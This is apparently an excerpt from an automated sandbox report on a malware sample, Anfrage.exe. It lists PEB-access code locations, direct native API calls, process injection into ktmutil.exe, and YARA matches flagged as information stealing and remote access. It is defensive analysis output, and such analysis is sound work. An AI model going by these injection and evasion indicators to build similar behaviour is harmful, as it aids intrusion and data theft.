            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36497120 mov eax, dword ptr fs:[00000030h]7_2_36497120
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C7152 mov eax, dword ptr fs:[00000030h]7_2_363C7152
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9148 mov eax, dword ptr fs:[00000030h]7_2_363B9148
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9148 mov eax, dword ptr fs:[00000030h]7_2_363B9148
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9148 mov eax, dword ptr fs:[00000030h]7_2_363B9148
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9148 mov eax, dword ptr fs:[00000030h]7_2_363B9148
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364951CB mov eax, dword ptr fs:[00000030h]7_2_364951CB
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DB1B0 mov eax, dword ptr fs:[00000030h]7_2_363DB1B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364931E1 mov eax, dword ptr fs:[00000030h]7_2_364931E1
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364671F9 mov esi, dword ptr fs:[00000030h]7_2_364671F9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36475180 mov eax, dword ptr fs:[00000030h]7_2_36475180
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36475180 mov eax, dword ptr fs:[00000030h]7_2_36475180
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E51EF mov eax, dword ptr fs:[00000030h]7_2_363E51EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C51ED mov eax, dword ptr fs:[00000030h]7_2_363C51ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36417190 mov eax, dword ptr fs:[00000030h]7_2_36417190
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364711A4 mov eax, dword ptr fs:[00000030h]7_2_364711A4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364711A4 mov eax, dword ptr fs:[00000030h]7_2_364711A4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364711A4 mov eax, dword ptr fs:[00000030h]7_2_364711A4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364711A4 mov eax, dword ptr fs:[00000030h]7_2_364711A4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FD1D0 mov eax, dword ptr fs:[00000030h]7_2_363FD1D0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FD1D0 mov ecx, dword ptr fs:[00000030h]7_2_363FD1D0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647DE46 mov eax, dword ptr fs:[00000030h]7_2_3647DE46
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1E30 mov eax, dword ptr fs:[00000030h]7_2_363C1E30
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1E30 mov eax, dword ptr fs:[00000030h]7_2_363C1E30
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DDE2D mov eax, dword ptr fs:[00000030h]7_2_363DDE2D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DDE2D mov eax, dword ptr fs:[00000030h]7_2_363DDE2D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DDE2D mov eax, dword ptr fs:[00000030h]7_2_363DDE2D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36469E56 mov ecx, dword ptr fs:[00000030h]7_2_36469E56
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FBE17 mov eax, dword ptr fs:[00000030h]7_2_363FBE17
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BDE10 mov eax, dword ptr fs:[00000030h]7_2_363BDE10
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BBE78 mov ecx, dword ptr fs:[00000030h]7_2_363BBE78
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36493E10 mov eax, dword ptr fs:[00000030h]7_2_36493E10
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36493E10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363FBE51 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363FBE51 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D5E40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36495E37 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36495E37 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36495E37 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3644FEC5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36479EDF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36479EDF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363BFEA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363BDEA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363BDEA5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363C7E96 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648BEE6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648BEE6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648BEE6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648BEE6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363F3E8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363C3EF4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363C3EF4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363C3EF4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363F3EEB mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363F3EEB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363F3EEB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363C3EE1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3644DE9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3644DEAA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3646DEB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3646DEB0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3646DEB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3646DEB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3646DEB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3647DEB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363BBEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363BBEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363CBEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363EFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3643FF42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3644DF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36441F13 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363EBF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3647DF2F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363C1F50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363F7F51 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36467F3E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3647BFC0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3647BFC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36493FC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363FBFB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36443FD7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363BFF90 mov edi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D1F92 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D1F92 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D1F92 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D1F92 mov ecx, dword ptr fs:[00000030h]

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtCreateMutant: Direct from: 0x774635CC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtWriteVirtualMemory: Direct from: 0x77462E3C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtMapViewOfSection: Direct from: 0x77462D1C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtResumeThread: Direct from: 0x774636AC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtProtectVirtualMemory: Direct from: 0x77462F9C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtSetInformationProcess: Direct from: 0x77462C5C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtSetInformationThread: Direct from: 0x774563F9
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtNotifyChangeKey: Direct from: 0x77463C2C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtProtectVirtualMemory: Direct from: 0x77457B2E
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtAllocateVirtualMemory: Direct from: 0x77462BFC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtQueryInformationProcess: Direct from: 0x77462C26
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtResumeThread: Direct from: 0x77462FBC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtReadFile: Direct from: 0x77462ADC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtQuerySystemInformation: Direct from: 0x77462DFC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtDelayExecution: Direct from: 0x77462DDC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtAllocateVirtualMemory: Direct from: 0x77463C9C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtCreateUserProcess: Direct from: 0x7746371C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtWriteVirtualMemory: Direct from: 0x7746490C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtAllocateVirtualMemory: Direct from: 0x774648EC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtQuerySystemInformation: Direct from: 0x774648CC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtQueryVolumeInformationFile: Direct from: 0x77462F2C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtReadVirtualMemory: Direct from: 0x77462E8C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtCreateKey: Direct from: 0x77462C6C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtSetInformationThread: Direct from: 0x77462B4C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtQueryAttributesFile: Direct from: 0x77462E6C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtDeviceIoControlFile: Direct from: 0x77462AEC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtOpenSection: Direct from: 0x77462E0C
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtCreateFile: Direct from: 0x77462FEC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtOpenFile: Direct from: 0x77462DCC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtQueryInformationToken: Direct from: 0x77462CAC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtAllocateVirtualMemory: Direct from: 0x77462BEC
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | NtOpenKeyEx: Direct from: 0x77462B9C
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: NULL target: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: NULL target: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe protection: read write
            Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: NULL target: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\ktmutil.exe | Thread APC queued: target process: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe
            Source: C:\Users\user\Desktop\Anfrage.exe | Process created: C:\Users\user\Desktop\Anfrage.exe "C:\Users\user\Desktop\Anfrage.exe"
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
            Source: mrdYGoZBmXi.exe, 00000008.00000002.2647181898.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000000.2402821903.0000000000F00000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: mrdYGoZBmXi.exe, 00000008.00000002.2647181898.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000000.2402821903.0000000000F00000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: mrdYGoZBmXi.exe, 00000008.00000002.2647181898.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000000.2402821903.0000000000F00000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
            Source: mrdYGoZBmXi.exe, 00000008.00000002.2647181898.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000000.2402821903.0000000000F00000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 0_2_00405DE5 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000007.00000002.2511601246.00000000370E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2646659218.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2476059980.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.2647873308.00000000023D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2646605622.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match | File source: 00000007.00000002.2511601246.00000000370E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2646659218.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2476059980.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.2647873308.00000000023D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
